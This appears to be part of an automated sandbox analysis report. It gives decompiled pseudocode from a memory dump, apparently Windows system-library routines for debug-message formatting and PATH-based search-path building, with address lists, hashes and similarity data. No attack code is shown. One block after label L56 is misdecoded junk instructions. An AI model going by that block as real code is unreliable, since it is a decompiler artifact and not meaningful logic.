				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0389D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0388D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0388F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0389DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0388B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0388B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0388E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0388A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0384b171
0x0384b171
0x0384b171
0x0384b171
0x0384b171
0x0384b176
0x0384b17b
0x0384b180
0x0384b186
0x0384b18f
0x0384b198
0x0384b1a4
0x0384b1aa
0x038a4802
0x038a4802
0x038a4805
0x038a480c
0x038a480e
0x0384b1d1
0x0384b1d3
0x0384b1de
0x0384b1de
0x038a4817
0x038a481e
0x038a4820
0x038a4822
0x038a4822
0x038a4824
0x038a4824
0x038a482a
0x00000000
0x00000000
0x038a4835
0x038a483a
0x038a483d
0x038a483f
0x038a4842
0x038a4842
0x038a4842
0x038a4846
0x038a484c
0x038a484e
0x038a4851
0x038a4851
0x038a4853
0x038a4854
0x038a4854
0x038a4858
0x038a485a
0x038a485a
0x038a485d
0x038a485f
0x038a4861
0x038a4861
0x038a4866
0x038a486b
0x038a486e
0x038a4871
0x038a4876
0x038a4876
0x038a4878
0x038a487b
0x038a4884
0x038a4884
0x00000000
0x038a487d
0x038a487d
0x038a4882
0x038a4889
0x038a4889
0x038a488f
0x038a4891
0x038a48e0
0x038a48e2
0x038a48e4
0x038a48e4
0x038a48e7
0x038a48e7
0x038a48ed
0x038a48f4
0x038a48f6
0x038a4951
0x038a4951
0x038a4953
0x038a4953
0x038a4956
0x038a4956
0x038a4958
0x038a4959
0x038a4959
0x038a495d
0x038a495d
0x038a495f
0x038a495f
0x038a4965
0x038a4969
0x038a49ba
0x038a49ba
0x038a49c1
0x038a49c5
0x038a49cc
0x038a49d4
0x038a49d7
0x038a49da
0x038a49e4
0x038a49e5
0x038a49f3
0x038a4a02
0x00000000
0x038a4a02
0x038a4972
0x038a4974
0x00000000
0x00000000
0x038a4976
0x038a4979
0x038a4982
0x038a4983
0x038a4984
0x038a498b
0x038a498d
0x038a4991
0x038a4993
0x038a4999
0x038a499d
0x038a49a2
0x038a49a2
0x038a49a2
0x038a4999
0x038a49ac
0x00000000
0x038a49b3
0x038a48f8
0x038a48fe
0x00000000
0x00000000
0x00000000
0x038a48fe
0x038a4895
0x038a489c
0x038a48ad
0x038a48b2
0x038a48b5
0x038a48b7
0x038a48ba
0x038a48bc
0x038a48c6
0x038a48c6
0x038a48cb
0x038a48d1
0x038a48d4
0x038a48d8
0x038a48d8
0x00000000
0x038a48d8
0x038a48be
0x038a48c0
0x00000000
0x00000000
0x038a48c2
0x00000000
0x00000000
0x00000000
0x038a48c4
0x00000000
0x038a4882
0x038a487b
0x038a4904
0x038a4906
0x00000000
0x00000000
0x038a4908
0x038a490e
0x00000000
0x00000000
0x038a4910
0x038a4917
0x038a4917
0x00000000
0x038a4917
0x0384b1ba
0x038a47f9
0x038a47fc
0x00000000
0x00000000
0x00000000
0x038a47fc
0x0384b1c0
0x0384b1c0
0x0384b1c3
0x0384b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 038A48AD

Memory Dump Source

Source File: 00000002.00000002.740509819.0000000003820000.00000040.00000001.sdmp, Offset: 03820000, based on PE: true

Associated: 00000002.00000002.740700423.000000000393B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: e803a36e36ae6f8a0b39e07f14690caaa1c2089790e97c74bd0efda862dc522f
Instruction ID: 473465f3ab1d34ed4c731a836963a886772d6c075eb76633dd98b7375065be55
Opcode Fuzzy Hash: e803a36e36ae6f8a0b39e07f14690caaa1c2089790e97c74bd0efda862dc522f
Instruction Fuzzy Hash: 7C510075D046998EEF31CFADC840BAEBBB4AF00710F2841E9D859EB391D3B48945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03872581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E03872581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1546912643) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t241;
				signed int _t245;
				void* _t249;
				intOrPtr _t250;
				intOrPtr _t251;
				signed int _t256;
				signed int _t258;
				intOrPtr _t260;
				signed int _t263;
				signed int _t270;
				signed int _t273;
				signed int _t281;
				signed int _t287;
				signed int _t289;
				intOrPtr* _t292;
				intOrPtr* _t293;
				signed int _t294;
				unsigned int _t297;
				signed int _t301;
				signed int _t303;
				signed int _t307;
				intOrPtr _t319;
				signed int _t328;
				signed int _t330;
				signed int _t331;
				signed int _t335;
				signed int _t336;
				void* _t340;
				signed int _t341;
				signed int _t343;
				signed int _t346;
				void* _t347;
				intOrPtr _t349;

				_t343 = _t346;
				_t347 = _t346 - 0x4c;
				_v8 =  *0x393d360 ^ _t343;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t335 = 0x393b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t297 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t287 = 0x48;
				_t317 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t328 = 0;
				_v37 = _t317;
				if(_v48 <= 0) {
					L16:
					_t45 = _t287 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t336 = 0xc0000106;
						goto L32;
					} else {
						_t335 = L03864620(_t297,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t287);
						_v52 = _t335;
						__eflags = _t335;
						if(_t335 == 0) {
							_t336 = 0xc0000017;
							goto L32;
						} else {
							 *(_t335 + 0x44) =  *(_t335 + 0x44) & 0x00000000;
							_t50 = _t335 + 0x48; // 0x48
							_t330 = _t50;
							_t317 = _v32;
							 *(_t335 + 0x3c) = _t287;
							_t289 = 0;
							 *((short*)(_t335 + 0x30)) = _v48;
							__eflags = _t317;
							if(_t317 != 0) {
								 *(_t335 + 0x18) = _t330;
								__eflags = _t317 - 0x3938478;
								 *_t335 = ((0 | _t317 == 0x03938478) - 0x00000001 & 0xfffffffb) + 7;
								E0388F3E0(_t330,  *((intOrPtr*)(_t317 + 4)),  *_t317 & 0x0000ffff);
								_t317 = _v32;
								_t347 = _t347 + 0xc;
								_t289 = 1;
								__eflags = _a8;
								_t330 = _t330 + (( *_t317 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t281 = E038D39F2(_t330);
									_t317 = _v32;
									_t330 = _t281;
								}
							}
							_t301 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t336 = _v68;
								__eflags = 0;
								 *((short*)(_t330 - 2)) = 0;
								goto L32;
							} else {
								_t287 = _t335 + _t289 * 4;
								_v56 = _t287;
								do {
									__eflags = _t317;
									if(_t317 != 0) {
										_t241 =  *(_v60 + _t301 * 4);
										__eflags = _t241;
										if(_t241 == 0) {
											goto L30;
										} else {
											__eflags = _t241 == 5;
											if(_t241 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t287 =  *(_v60 + _t301 * 4);
										 *(_t287 + 0x18) = _t330;
										_t245 =  *(_v60 + _t301 * 4);
										__eflags = _t245 - 8;
										if(_t245 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t245 * 4 +  &M03872959))) {
												case 0:
													__ax =  *0x3938488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0388F3E0(__edi,  *0x393848c, __ax & 0x0000ffff);
														__eax =  *0x3938488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0388F3E0(_t330, _v80, _v64);
													_t276 = _v64;
													goto L26;
												case 2:
													 *0x3938480 & 0x0000ffff = E0388F3E0(__edi,  *0x3938484,  *0x3938480 & 0x0000ffff);
													__eax =  *0x3938480 & 0x0000ffff;
													__eax = ( *0x3938480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0388F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0388F3E0(_t330, _v76, _v36);
														_t276 = _v36;
													}
													L26:
													_t347 = _t347 + 0xc;
													_t330 = _t330 + (_t276 >> 1) * 2 + 2;
													__eflags = _t330;
													L27:
													_push(0x3b);
													_pop(_t278);
													 *((short*)(_t330 - 2)) = _t278;
													goto L28;
												case 6:
													__ebx =  *0x393575c;
													__eflags = __ebx - 0x393575c;
													if(__ebx != 0x393575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0388F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x393575c;
														} while (__ebx != 0x393575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x3938478 & 0x0000ffff = E0388F3E0(__edi,  *0x393847c,  *0x3938478 & 0x0000ffff);
													__eax =  *0x3938478 & 0x0000ffff;
													__eax = ( *0x3938478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E038D39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x3936e58 & 0x0000ffff = E0388F3E0(__edi,  *0x3936e5c,  *0x3936e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x3936e58 & 0x0000ffff;
													__eax = ( *0x3936e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t301 = _v16;
													_t317 = _v32;
													L29:
													_t287 = _t287 + 4;
													__eflags = _t287;
													_v56 = _t287;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t301 = _t301 + 1;
									_v16 = _t301;
									__eflags = _t301 - _v48;
								} while (_t301 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t245 =  *(_v60 + _t328 * 4);
						if(_t245 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t245 * 4 +  &M03872935))) {
							case 0:
								__ax =  *0x3938488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t317 =  &_v64;
								_v80 = E03872E3E(0,  &_v64);
								_t287 = _t287 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x3938480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3938480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0385EEF0(0x39379a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0385EB70(__ecx, 0x39379a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t219 = _v72;
											__eflags = _t219;
											if(_t219 != 0) {
												L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
											}
											_t220 = _v52;
											__eflags = _t220;
											if(_t220 != 0) {
												__eflags = _t336;
												if(_t336 < 0) {
													L038677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t220);
													_t220 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t297 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x3937b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L03864620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0385EB70(__ecx, 0x39379a0);
										__eax = _v52;
										L36:
										_pop(_t329);
										_pop(_t337);
										__eflags = _v8 ^ _t343;
										_pop(_t288);
										return E0388B640(_t220, _t288, _v8 ^ _t343, _t317, _t329, _t337);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t283 = _v56;
								if(_v56 != 0) {
									_t317 =  &_v36;
									_t285 = E03872E3E(_t283,  &_v36);
									_t297 = _v36;
									_v76 = _t285;
								}
								if(_t297 == 0) {
									goto L44;
								} else {
									_t287 = _t287 + 2 + _t297;
								}
								goto L14;
							case 6:
								__eax =  *0x3935764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x3938478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3938478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x3936e58 & 0x0000ffff;
								__eax = ( *0x3936e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t328 = _t328 + 1;
								if(_t328 >= _v48) {
									goto L16;
								} else {
									_t317 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					 *_t287 = _t245;
					asm("o16 sub [edi-0x78d81ffd], al");
					 *[es:ebx] =  *_t287;
					 *((intOrPtr*)(_t330 - 0x78d9fafd)) =  *((intOrPtr*)(_t330 - 0x78d9fafd)) -  *[es:ebx];
					_t292 = 0x25;
					_t249 = _t347;
					_t349 =  *_t292;
					 *((intOrPtr*)(_t330 - 0x74a4cafd)) =  *((intOrPtr*)(_t330 - 0x74a4cafd)) - _t249;
					_t250 = _t249 +  *_t317;
					 *((intOrPtr*)(_t330 - 0x78d77ffd)) =  *((intOrPtr*)(_t330 - 0x78d77ffd)) - _t250;
					asm("daa");
					_t251 =  *_t292;
					 *_t292 = _t250;
					_push(ds);
					 *((intOrPtr*)(_t330 - 0x78d7b1fd)) =  *((intOrPtr*)(_t330 - 0x78d7b1fd)) - _t251;
					_t293 = _t292 + _a35;
					 *_t293 = _t251;
					asm("fcomp dword [ebx-0x75]");
					_t340 = _t335 + 1 + _t335 + 1 +  *((intOrPtr*)( *_t293 +  &_a1546912643));
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x391ff00);
					E0389D08C(_t293, _t330, _t340);
					_v44 =  *[fs:0x18];
					_t331 = 0;
					 *_a24 = 0;
					_t294 = _a12;
					__eflags = _t294;
					if(_t294 == 0) {
						_t256 = 0xc0000100;
					} else {
						_v8 = 0;
						_t341 = 0xc0000100;
						_v52 = 0xc0000100;
						_t258 = 4;
						while(1) {
							_v40 = _t258;
							__eflags = _t258;
							if(_t258 == 0) {
								break;
							}
							_t307 = _t258 * 0xc;
							_v48 = _t307;
							__eflags = _t294 -  *((intOrPtr*)(_t307 + 0x3821664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t273 = E0388E5C0(_a8,  *((intOrPtr*)(_t307 + 0x3821668)), _t294);
									_t349 = _t349 + 0xc;
									__eflags = _t273;
									if(__eflags == 0) {
										_t341 = E038C51BE(_t294,  *((intOrPtr*)(_v48 + 0x382166c)), _a16, _t331, _t341, __eflags, _a20, _a24);
										_v52 = _t341;
										break;
									} else {
										_t258 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t258 = _t258 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t341;
						__eflags = _t341;
						if(_t341 < 0) {
							__eflags = _t341 - 0xc0000100;
							if(_t341 == 0xc0000100) {
								_t303 = _a4;
								__eflags = _t303;
								if(_t303 != 0) {
									_v36 = _t303;
									__eflags =  *_t303 - _t331;
									if( *_t303 == _t331) {
										_t341 = 0xc0000100;
										goto L76;
									} else {
										_t319 =  *((intOrPtr*)(_v44 + 0x30));
										_t260 =  *((intOrPtr*)(_t319 + 0x10));
										__eflags =  *((intOrPtr*)(_t260 + 0x48)) - _t303;
										if( *((intOrPtr*)(_t260 + 0x48)) == _t303) {
											__eflags =  *(_t319 + 0x1c);
											if( *(_t319 + 0x1c) == 0) {
												L106:
												_t341 = E03872AE4( &_v36, _a8, _t294, _a16, _a20, _a24);
												_v32 = _t341;
												__eflags = _t341 - 0xc0000100;
												if(_t341 != 0xc0000100) {
													goto L69;
												} else {
													_t331 = 1;
													_t303 = _v36;
													goto L75;
												}
											} else {
												_t263 = E03856600( *(_t319 + 0x1c));
												__eflags = _t263;
												if(_t263 != 0) {
													goto L106;
												} else {
													_t303 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t341 = E03872C50(_t303, _a8, _t294, _a16, _a20, _a24, _t331);
											L76:
											_v32 = _t341;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0385EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t341 = _a24;
									_t270 = E03872AE4( &_v36, _a8, _t294, _a16, _a20, _t341);
									_v32 = _t270;
									__eflags = _t270 - 0xc0000100;
									if(_t270 == 0xc0000100) {
										_v32 = E03872C50(_v36, _a8, _t294, _a16, _a20, _t341, 1);
									}
									_v8 = _t331;
									E03872ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t256 = _t341;
					}
					L70:
					return E0389D0D1(_t256);
				}
				L108:
			}

0x03872584
0x03872586
0x03872590
0x03872596
0x03872597
0x03872598
0x03872599
0x0387259e
0x038725a4
0x038725a9
0x038725ac
0x038725ae
0x038725b1
0x038725b2
0x038725b5
0x038725b8
0x038725bb
0x038725bc
0x038725bf
0x038725c2
0x038725c5
0x038725c6
0x038725cb
0x038725ce
0x038725d8
0x038725dd
0x038725de
0x038725e1
0x038725e3
0x038725e9
0x038726da
0x038726da
0x038726dd
0x038726e2
0x038b5b56
0x00000000
0x038726e8
0x038726f9
0x038726fb
0x038726fe
0x03872700
0x038b5b60
0x00000000
0x03872706
0x03872706
0x0387270a
0x0387270a
0x0387270d
0x03872713
0x03872716
0x03872718
0x0387271c
0x0387271e
0x038b5b6c
0x038b5b6f
0x038b5b7f
0x038b5b89
0x038b5b8e
0x038b5b93
0x038b5b96
0x038b5b9c
0x038b5ba0
0x038b5ba3
0x038b5bab
0x038b5bb0
0x038b5bb3
0x038b5bb3
0x038b5ba3
0x03872724
0x03872726
0x03872729
0x0387272c
0x0387279d
0x0387279d
0x038727a0
0x038727a2
0x00000000
0x0387272e
0x0387272e
0x03872731
0x03872734
0x03872734
0x03872736
0x038b5bc1
0x038b5bc1
0x038b5bc4
0x00000000
0x038b5bca
0x038b5bca
0x038b5bcd
0x00000000
0x038b5bd3
0x00000000
0x038b5bd3
0x038b5bcd
0x0387273c
0x0387273c
0x03872742
0x03872747
0x0387274a
0x0387274d
0x03872750
0x00000000
0x03872756
0x03872756
0x00000000
0x03872902
0x03872908
0x0387290b
0x00000000
0x03872911
0x0387291c
0x03872921
0x00000000
0x03872921
0x00000000
0x00000000
0x03872880
0x03872887
0x0387288c
0x00000000
0x00000000
0x03872805
0x0387280a
0x03872814
0x03872816
0x00000000
0x00000000
0x0387281e
0x03872821
0x03872823
0x00000000
0x03872829
0x03872829
0x03872831
0x0387283c
0x0387283e
0x00000000
0x0387283e
0x00000000
0x00000000
0x0387284e
0x03872850
0x03872851
0x03872854
0x03872857
0x0387285a
0x0387285c
0x0387285d
0x00000000
0x00000000
0x0387275d
0x03872761
0x00000000
0x03872767
0x0387276e
0x03872773
0x03872773
0x03872776
0x03872778
0x0387277e
0x0387277e
0x03872781
0x03872781
0x03872783
0x03872784
0x00000000
0x00000000
0x038b5bd8
0x038b5bde
0x038b5be4
0x038b5be6
0x038b5be8
0x038b5be9
0x038b5bee
0x038b5bf8
0x038b5bff
0x038b5c01
0x038b5c04
0x038b5c07
0x038b5c0b
0x038b5c0d
0x038b5c0d
0x038b5c15
0x038b5c18
0x038b5c1b
0x038b5c1b
0x038b5c1e
0x00000000
0x00000000
0x038728c3
0x038728c8
0x038728d2
0x038728d4
0x038728d8
0x038728db
0x038b5c26
0x038b5c28
0x038b5c2d
0x038b5c2d
0x00000000
0x00000000
0x038b5c34
0x038b5c36
0x038b5c49
0x038b5c4e
0x038b5c54
0x038b5c5b
0x038b5c5d
0x038b5c60
0x03872788
0x03872788
0x0387278b
0x0387278e
0x0387278e
0x0387278e
0x03872791
0x00000000
0x00000000
0x03872756
0x03872750
0x00000000
0x03872794
0x03872794
0x03872795
0x03872798
0x03872798
0x00000000
0x03872734
0x0387272c
0x03872700
0x038725ef
0x038725ef
0x038725ef
0x038725f2
0x038725f8
0x00000000
0x00000000
0x038725fe
0x00000000
0x038728e6
0x038728ec
0x038728ef
0x038728f5
0x038728f8
0x038728f8
0x00000000
0x038728f8
0x00000000
0x00000000
0x03872866
0x03872866
0x03872876
0x03872879
0x00000000
0x00000000
0x038727e0
0x038727e7
0x038727e9
0x038727eb
0x038b5afd
0x00000000
0x038b5afd
0x00000000
0x00000000
0x03872633
0x03872638
0x0387263b
0x0387263c
0x0387263e
0x03872640
0x03872642
0x03872647
0x03872649
0x0387264e
0x03872650
0x03872653
0x03872659
0x038726a2
0x038726a7
0x038726ac
0x038726b2
0x038b5b11
0x038b5b15
0x038b5b17
0x00000000
0x038726b8
0x038726b8
0x038726ba
0x038727a6
0x038727a6
0x038727a9
0x038727ab
0x038727b9
0x038727b9
0x038727be
0x038727c1
0x038727c3
0x038727c5
0x038727c7
0x038b5c74
0x038b5c79
0x038b5c79
0x038727c7
0x00000000
0x038726c0
0x038726c0
0x038726c3
0x038726c6
0x038726c6
0x038726c9
0x038726c9
0x00000000
0x038726c9
0x038726ba
0x0387265b
0x0387265b
0x0387265e
0x03872667
0x0387266d
0x03872677
0x0387267c
0x0387267f
0x03872681
0x038b5b49
0x038b5b4e
0x038727cd
0x038727d0
0x038727d1
0x038727d2
0x038727d4
0x038727dd
0x03872687
0x03872687
0x0387268a
0x0387268b
0x0387268e
